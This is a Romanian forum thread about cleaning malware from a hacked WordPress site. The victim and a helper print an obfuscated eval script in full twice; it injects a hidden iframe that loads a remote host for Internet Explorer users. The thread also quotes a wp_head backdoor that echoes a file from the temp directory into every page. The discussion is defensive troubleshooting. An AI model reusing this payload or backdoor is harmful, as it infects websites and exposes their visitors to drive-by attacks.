Site-ul meu a fost infectat - Cum sterg malware din wp_heap?

[Cika-Bum]

acum doua zile am observat ca siteul meu a fost atacat

am cautat codul care trebuie inlaturat si am observat ca este pus in wp_head, fisier pe care nu reusesc sa il gasesc. Din cate am inteles acest fisier e generat de general-template.php, si pentru fiecare versiune wordpress "wp_head"-ul incepe de la o alta linie.
Cu toate astea, nu gasesc nimic suspect acolo.
Evident nici nu stiu cum sa scot codul malitios din el

Cod malitios, luat din sursa pagini index a site-ului:

Cod:

<style type="text/css">body{background-color:#02526a;}</style> <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|jfhjf|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
</script>

Am mare nevoie de ajutor!

Multumesc in avans, oricui binevoieste sa dea o mana de ajutor.

[avram]

imi este periodic atacat situl si Google ma baneaza

[Andrei S]

wp_head nu este un fisier ci un hook. De regula informatia din wp_head este adaugata prin functia: add_action('wp_head', 'your_function');.

Da niste search-uri pe scripturi ( tot folderul wordpress ) dupa bucati din cod precum:
<script>eval
eval(function

Ca sa iti faci o idee secventa aia de cod malicioasa poate fi adaugata acolo unde este prin mai multe feluri: functions.php ( exclud daca nu ai mai avut probleme pana acum ), pluginuri sau chiar si fisiere ale temei. Repet daca "este pus in wp_head" codul nu este scris pur si simplu ci adaugat printr-o actiune.
Incerc un exemplu mai jos dar este strict ca sa iti faci o idee:

Cod PHP:

<?php
add_action('wp_head', 'add_js');
function add_js() {
    echo "<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|jfhjf|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
</script>";
}
?>

PS: ai antivirus, nu???

PPS: in genul acesta de situatii, cauta raspunsul si daca nu il gasesti fa o intrebare si la comunitatile specializate. In context: wordpress.stackexchange.com/ sau wordpress.org/support/

[Cika-Bum]

multumesc @avram, ai fost super util

ontopic:

@Andrei S multumesc pentru sfat, era intr-adevar un action acolo, dar era in wp-settings.php (lucru pe care l-am observat acum 10 min, dupa ce am facut click pe Last Modified in Filezilla.

in fine, totul s-a terminat cu bine (cel putin asa cred).

am schimbat parole, s.a.m.d.

asa arata "action"-ul pe care l-au pus oamenii:

Cod:

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);

cele rele sa se spele

sa auzim de bine si multumesc inca o data pentru sprijin
do_action( ‘init’ );